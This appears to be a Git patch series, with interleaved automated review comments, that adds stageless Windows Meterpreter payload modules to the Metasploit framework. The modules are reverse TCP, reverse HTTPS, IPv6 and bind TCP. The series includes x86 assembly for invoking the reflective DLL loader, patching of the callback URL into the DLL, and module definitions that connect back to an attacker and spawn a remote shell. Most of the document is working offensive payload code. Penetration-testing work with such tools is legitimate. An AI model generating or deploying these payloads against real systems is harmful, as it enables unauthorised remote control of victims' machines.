From 345b5cc8e171280383734dfac183f49b71f4935e Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 12 Mar 2015 09:45:09 +1000 Subject: [PATCH 1/8] Add stageless meterpreter support This commit adds plumbing which allows for the creation of stageless meterpreter payloads that include extensions. The included transprots at this point are bind_tcp, reverse_tcp and reverse_https, all x86. More coming for x64. Will also validate http soon. --- Gemfile.lock | 2 +- lib/msf/core/handler/reverse_http.rb | 2 +- .../payload/windows/stageless_meterpreter.rb | 106 ++++++++++++++++++ lib/rex/post/meterpreter/client_core.rb | 72 +++++++++--- .../singles/windows/meterpreter_bind_tcp.rb | 42 +++++++ .../windows/meterpreter_reverse_https.rb | 70 ++++++++++++ .../windows/meterpreter_reverse_tcp.rb | 41 +++++++ 7 files changed, 317 insertions(+), 18 deletions(-) create mode 100644 lib/msf/core/payload/windows/stageless_meterpreter.rb create mode 100644 modules/payloads/singles/windows/meterpreter_bind_tcp.rb create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb diff --git a/Gemfile.lock b/Gemfile.lock index fa2547a62f..43070d2f35 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.14) + meterpreter_bins (= 0.0.15) msgpack nokogiri packetfu (= 1.1.9) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index b44ad8017b..9c6312f248 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
@@ -288,7 +288,7 @@ protected # Grab the checksummed version of CONN from the payload's request. conn_id = req.relative_resource.gsub("/", "") - print_status("Incoming orphaned session #{conn_id}, reattaching...") + print_status("Incoming orphaned or stageless session #{conn_id}, attaching...") # Short-circuit the payload's handle_connection processing for create_session create_session(cli, { diff --git a/lib/msf/core/payload/windows/stageless_meterpreter.rb b/lib/msf/core/payload/windows/stageless_meterpreter.rb new file mode 100644 index 0000000000..2e4ed3c6eb --- /dev/null +++ b/lib/msf/core/payload/windows/stageless_meterpreter.rb 
@@ -0,0 +1,106 @@ +#-*- coding: binary -*- + +require 'msf/core' + +module Msf + +## +# +# Implements stageless invocation of metsrv in x86 +# +## + +module Payload::Windows::StagelessMeterpreter + + include Msf::Payload::Windows + include Msf::Payload::Single + include Msf::ReflectiveDLLLoader + + def asm_invoke_metsrv(opts={}) + asm = %Q^ + ; prologue + dec ebp ; 'M' + pop edx ; 'Z' + call $+5 ; call next instruction + pop ebx ; get the current location (+7 bytes) + push edx ; restore edx + inc ebp ; restore ebp + push ebp ; save ebp for later + mov ebp, esp ; set up a new stack frame + ; Invoke ReflectiveLoader() + ; add the offset to ReflectiveLoader() (0x????????) + add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)} + call ebx ; invoke ReflectiveLoader() + ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) + ; offset from ReflectiveLoader() to the end of the DLL + add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} + push ebx ; push the pointer to the extension list + push 4 ; indicate that we have attached + push eax ; push some arbitrary value for hInstance + mov ebx, eax ; save DllMain for another call + call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) + ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) + ; push the exitfunk value onto the stack + push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]} + push 5 ; indicate that we have detached + push eax ; push some arbitrary value for hInstance + call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) + ^ + + asm + end + + def generate_stageless_meterpreter(url = nil) + dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll')) + + conf = { + :rdi_offset => offset, + :length => dll.length, + :exitfunk => datastore['EXITFUNC'] + } + + asm = asm_invoke_metsrv(conf) + + # generate the bootstrap asm + bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string + + # sanity check bootstrap length to ensure we dont 
overwrite the DOS headers e_lfanew entry + if bootstrap.length > 62 + print_error("Stageless Meterpreter generated with oversized x86 bootstrap.") + return + end + + # patch the binary with all the stuff + dll[0, bootstrap.length] = bootstrap + + # the URL might not be given, as it might be patched in some other way + if url + url = "s#{url}\x00" + location = dll.index("https://#{'X' * 256}") + dll[location, url.length] = url + end + + # if a block is given then call that with the meterpreter dll + # so that custom patching can happen if required + yield dll if block_given? + + # append each extension to the payload, including + # the size of the extension + unless datastore['EXTENSIONS'].nil? + datastore['EXTENSIONS'].split(',').each do |e| + e = e.strip.downcase + ext, o = load_rdi_dll(MeterpreterBinaries.path("ext_server_#{e}", 'x86.dll')) + + # append the size, offset to RDI and the payload itself + dll << [ext.length].pack('V') + ext + end + end + + # Terminate the "list" of extensions + dll + [0].pack('V') + end + +end + +end + diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index ab67096026..542927e68e 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb 
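Review bot: The oversized-bootstrap branch in `generate_stageless_meterpreter` calls `print_error` and then does a bare `return`, so each module's `generate` hands nil to a caller that expects a String. Raising makes the failure explicit: `raise RuntimeError, "Stageless Meterpreter generated with oversized x86 bootstrap."`. In the extension loop the comment says size, RDI offset and payload are appended, but only `[ext.length].pack('V') + ext` is written and `o` is never used. Correct the comment to `# append the size and the extension itself` and bind the unused value as `ext, _ = load_rdi_dll(...)`. Each name from EXTENSIONS is also interpolated into `MeterpreterBinaries.path` without checking the result, so a misspelt extension presumably surfaces as an unrelated error from `load_rdi_dll`.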
@@ -40,6 +40,35 @@ class ClientCore < Extension # Core commands # ## + # + # + # Get a list of loaded commands for the given extension. + # + def get_loaded_extension_commands(extension_name) + request = Packet.create_request('core_enumextcmd') + request.add_tlv(TLV_TYPE_STRING, extension_name) + + response = self.client.send_packet_wait_response(request, self.client.response_timeout) + + # No response? + if response.nil? + raise RuntimeError, "No response was received to the core_enumextcmd request.", caller + elsif response.result == 50 + # This case happens when the target doesn't support the core_enumextcmd message. + # If this is the case, then we just want to ignore the error and return an empty + # list. This will force the caller to load any required modules. + return [] + elsif response.result != 0 + raise RuntimeError, "The core_enumextcmd request failed with result: #{response.result}.", caller + end + + commands = [] + response.each(TLV_TYPE_STRING) { |c| + commands << c.value + } + + commands + end # # Loads a library on the remote meterpreter instance. This method 
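Review bot: The header comment on `get_loaded_extension_commands` opens with stray empty `#` lines and documents neither what the method returns nor that it raises. Suggested comment, in the file's existing style: `# Returns an Array of command name Strings reported by the remote instance for extension_name, or an empty Array when the request is not supported. Raises RuntimeError when no response arrives within client.response_timeout.` The collection loop is a multi-line brace block; `do |c| ... end` would match the usual convention for multi-line blocks.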
@@ -153,25 +182,36 @@ class ClientCore < Extension if mod.nil? raise RuntimeError, "No modules were specified", caller end - # Get us to the installation root and then into data/meterpreter, where - # the file is expected to be - modname = "ext_server_#{mod.downcase}" - path = MeterpreterBinaries.path(modname, client.binary_suffix) - if opts['ExtensionPath'] - path = ::File.expand_path(opts['ExtensionPath']) + # Query the remote instance to see if commands for the extension are + # already loaded + commands = get_loaded_extension_commands(mod.downcase) + + # if there are existing commands for the given extension, then we can use + # what's already there + unless commands.length > 0 + # Get us to the installation root and then into data/meterpreter, where + # the file is expected to be + modname = "ext_server_#{mod.downcase}" + path = MeterpreterBinaries.path(modname, client.binary_suffix) + + if opts['ExtensionPath'] + path = ::File.expand_path(opts['ExtensionPath']) + end + + if path.nil? + raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller + end + + # Load the extension DLL + commands = load_library( + 'LibraryFilePath' => path, + 'UploadLibrary' => true, + 'Extension' => true, + 'SaveToDisk' => opts['LoadFromDisk']) end - if path.nil? - raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller - end - - # Load the extension DLL - commands = load_library( - 'LibraryFilePath' => path, - 'UploadLibrary' => true, - 'Extension' => true, - 'SaveToDisk' => opts['LoadFromDisk']) + # wire the commands into the client client.add_extension(mod, commands) return true diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb new file mode 100644 index 0000000000..a61a54d766 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb 
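Review bot: The new pre-check skips the whole load path whenever `get_loaded_extension_commands` returns a non-empty list, so a caller-supplied `opts['ExtensionPath']` is silently ignored if the session already reports commands for that extension name. If an explicit path is meant to take precedence, guard the query with it, e.g. `commands = opts['ExtensionPath'] ? [] : get_loaded_extension_commands(mod.downcase)`. Otherwise state the precedence in the comment above the check. `unless commands.length > 0` reads more directly as `if commands.empty?`. The enclosing method starts and ends outside this hunk.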
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Bind TCP Inline', + 'Description' => 'Connect to victim and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + # blank LHOST indicates bind payload + url = "tcp://:#{datastore['LPORT']}" + generate_stageless_meterpreter(url) + end + +end + diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..fc94a96f1a --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb 
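Review bot: The `EXTENSIONS` option text reads "Comma-separate list of extensions to load"; it should be `"Comma-separated list of extensions to load"`. The same `register_options` call with the same typo is repeated in meterpreter_reverse_https.rb and meterpreter_reverse_tcp.rb in this patch, and in meterpreter_reverse_ipv6_tcp.rb in patch 3. The option is only read by `generate_stageless_meterpreter` in the shared mixin, so registering it once next to the code that consumes it would keep the four modules from drifting apart. This is a point of structure and wording, not a behaviour change.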
@@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_https' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse HTTPS Inline', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN) + rand = Rex::Text.rand_text_alphanumeric(16) + url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/" + + generate_stageless_meterpreter(url) do |dll| + + # TODO: figure out this bit + # patch the target ID into the URI if specified + #if opts[:target_id] + # i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00") + # if i + # t = opts[:target_id].to_s + # raise "Target ID must be less than 5 bytes" if t.length > 4 + # u = "/B#{t} HTTP/1.0\r\n\r\n\x00" + # print_status("Patching Target ID #{t} into DLL") + # dll[i, u.length] = u + # end + #end + + Rex::Payloads::Meterpreter::Patch.patch_passive_service! 
dll, + :url => url, + :ssl => true, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ua => datastore['MeterpreterUserAgent'], + :proxyhost => datastore['PROXYHOST'], + :proxyport => datastore['PROXYPORT'], + :proxy_type => datastore['PROXY_TYPE'], + :proxy_username => datastore['PROXY_USERNAME'], + :proxy_password => datastore['PROXY_PASSWORD'] + end + end + +end + diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..a031f390c2 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -0,0 +1,41 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse TCP Inline', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}" + generate_stageless_meterpreter(url) + end + +end + From c5a74c7db4fd7ea7cd109abbb57aa7ee6ff2a671 Mon Sep 17 00:00:00 2001 
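Review bot: In `generate` of meterpreter_reverse_https.rb the local `rand = Rex::Text.rand_text_alphanumeric(16)` shadows `Kernel#rand` for the rest of the method; a descriptive name such as `uri_suffix` avoids that. The commented-out target-ID block refers to `opts`, which is not defined in this method, so it could not be re-enabled as written. Replace it with a single line such as `# TODO: patch the target ID into the URI once a target_id option is available here`, or remove it. `datastore['PROXY_PASSWORD']` is handed to `patch_passive_service!` together with the DLL, so the credential presumably ends up readable in the generated file. A comment saying so next to `:proxy_password` would help whoever handles these artefacts.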
From: OJ Date: Fri, 13 Mar 2015 20:14:54 +1000 Subject: [PATCH 2/8] Update the Meterpreter binaries version This will force the build/PR to be invalid until the new meterpreter binaries gem has been released. --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 43070d2f35..fa2547a62f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.15) + meterpreter_bins (= 0.0.14) msgpack nokogiri packetfu (= 1.1.9) From 35cfdf051ac0b0a1700586b512b207b4ef63cf43 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 13 Mar 2015 20:15:31 +1000 Subject: [PATCH 3/8] Add support for meterpreter_reverse_ipv6_tcp New payload added, makes use of existing functionality. --- .../windows/meterpreter_reverse_ipv6_tcp.rb | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..7dd5f24d64 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb 
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse TCP Inline (IPv6)', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) + ], self.class) + end + + def generate + url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}" + generate_stageless_meterpreter(url) + end + +end + From 1338a55b0de8db68a7a727a59811b1412fe443f1 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 13 Mar 2015 21:49:45 +1000 Subject: [PATCH 4/8] Adjust error handling for extension enumeration Make the catch case more generic for when the target doesn't support the command for extension enumeration. This supports more than just windows now. --- lib/rex/post/meterpreter/client_core.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 542927e68e..7fa9a99315 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb 
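Review bot: The URL built in `generate`, `"tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"`, puts an unbracketed IPv6 literal directly before `:port`. The host/port split is therefore ambiguous to a reader and depends on how the consumer parses the string, which this patch does not show. Please add a comment stating the expected format, for example `# format: tcp6://ADDRESS:PORT?SCOPE_ID, port taken after the last ':' (TODO confirm against the parser)`. The `SCOPEID` help text says it is required for "link-layer addresses"; "link-local addresses" is presumably what is meant.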
@@ -53,13 +53,11 @@ class ClientCore < Extension # No response? if response.nil? raise RuntimeError, "No response was received to the core_enumextcmd request.", caller - elsif response.result == 50 + elsif response.result != 0 # This case happens when the target doesn't support the core_enumextcmd message. # If this is the case, then we just want to ignore the error and return an empty # list. This will force the caller to load any required modules. return [] - elsif response.result != 0 - raise RuntimeError, "The core_enumextcmd request failed with result: #{response.result}.", caller end commands = [] From 03232befc7a196b5eb613318a27d22a3a1c2dffd Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 16 Mar 2015 17:14:36 +1000 Subject: [PATCH 5/8] Add extra check to avoid crashing on startup --- lib/msf/core/payload/windows/stageless_meterpreter.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/stageless_meterpreter.rb b/lib/msf/core/payload/windows/stageless_meterpreter.rb index 2e4ed3c6eb..b9ddaf0dfd 100644 --- a/lib/msf/core/payload/windows/stageless_meterpreter.rb +++ b/lib/msf/core/payload/windows/stageless_meterpreter.rb @@ -77,7 +77,9 @@ module Payload::Windows::StagelessMeterpreter if url url = "s#{url}\x00" location = dll.index("https://#{'X' * 256}") - dll[location, url.length] = url + if location + dll[location, url.length] = url + end end # if a block is given then call that with the meterpreter dll From abb8a32e68a0b12a2f533acf86c4cb58a5c1d18a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 16 Mar 2015 18:08:13 -0500 Subject: [PATCH 6/8] update spec for dynamic meterpreter payloads --- .../singles/windows/meterpreter_bind_tcp.rb | 2 + .../windows/meterpreter_reverse_https.rb | 2 + .../windows/meterpreter_reverse_ipv6_tcp.rb | 2 + .../windows/meterpreter_reverse_tcp.rb | 2 + spec/modules/payloads_spec.rb | 40 +++++++++++++++++++ 5 files changed, 48 insertions(+) 
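Review bot: With `elsif response.result != 0` now returning `[]`, every failure of `core_enumextcmd` is treated as "command not supported", yet the comment kept under that branch still describes only the unsupported-target case. A transport or server-side error therefore becomes indistinguishable from an older target and makes the caller upload the extension again. Update the comment to `# Any non-zero result is treated as "not supported"; the caller then loads the extension itself` and record the code, e.g. `dlog("core_enumextcmd returned #{response.result}")`. The body of `get_loaded_extension_commands` continues outside this hunk.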
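Review bot: The added `if location` guard in stageless_meterpreter.rb stops the nil-index failure, but when the `https://XXXX...` placeholder is not found the URL is silently left unpatched and the method still returns a result. A caller that passed a URL presumably expects it to be embedded, so report the miss in an `else` branch, e.g. `print_error("Transport URL placeholder not found; URL was not patched")`, or raise. Neither branch checks that `url.length` fits the placeholder (8 + 256 bytes as written here), so a longer URL would overwrite whatever follows it in `dll`. The rest of `generate_stageless_meterpreter` lies outside this hunk.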
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index a61a54d766..ce5d27d27d 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index fc94a96f1a..827dc0a0ab 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 7dd5f24d64..4801a8e63a 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index a031f390c2..f0a4f30bdf 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb 
@@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 698833c62a..432ff6aaf6 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2432,6 +2432,46 @@ describe 'modules/payloads', :content do reference_name: 'windows/messagebox' end + context 'windows/meterpreter_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_bind_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_bind_tcp' + end + + context 'windows/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_https' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_https' + end + + context 'windows/meterpreter_reverse_ipv6_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_ipv6_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_ipv6_tcp' + end + + context 'windows/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_tcp' + end + context 'windows/meterpreter/bind_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 349995a10931d5ae6611cf40212dc8f721d38a8c Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Mon, 16 Mar 2015 18:09:19 -0500 Subject: [PATCH 7/8] update gemspec for new meterpreter bins --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index fa2547a62f..6b20fd763c 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.14) + meterpreter_bins (= 0.0.15) msgpack nokogiri packetfu (= 1.1.9) @@ -132,7 +132,7 @@ GEM pg railties (< 4.0.0) recog (~> 1.0) - meterpreter_bins (0.0.14) + meterpreter_bins (0.0.15) method_source (0.8.2) mime-types (1.25.1) mini_portile (0.6.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 86331f4269..b9bc5a86c9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -64,7 +64,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 0.29.0' # Needed for Meterpreter on Windows, soon others. - spec.add_runtime_dependency 'meterpreter_bins', '0.0.14' + spec.add_runtime_dependency 'meterpreter_bins', '0.0.15' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # Needed by anemone crawler From 8ac032392b8da1e2ff572fb317685c13fbae75da Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 19 Mar 2015 14:51:03 +1000 Subject: [PATCH 8/8] Update meterpreter bins gem version --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6b20fd763c..aa5e42f9b6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.15) + meterpreter_bins (= 0.0.16) msgpack nokogiri packetfu (= 1.1.9) 
@@ -132,7 +132,7 @@ GEM pg railties (< 4.0.0) recog (~> 1.0) - meterpreter_bins (0.0.15) + meterpreter_bins (0.0.16) method_source (0.8.2) mime-types (1.25.1) mini_portile (0.6.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b9bc5a86c9..09b425b894 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -64,7 +64,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 0.29.0' # Needed for Meterpreter on Windows, soon others. - spec.add_runtime_dependency 'meterpreter_bins', '0.0.15' + spec.add_runtime_dependency 'meterpreter_bins', '0.0.16' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # Needed by anemone crawler